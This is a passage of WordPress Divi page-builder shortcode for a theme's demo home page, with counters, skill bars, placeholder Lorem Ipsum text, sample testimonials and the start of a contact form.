number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" 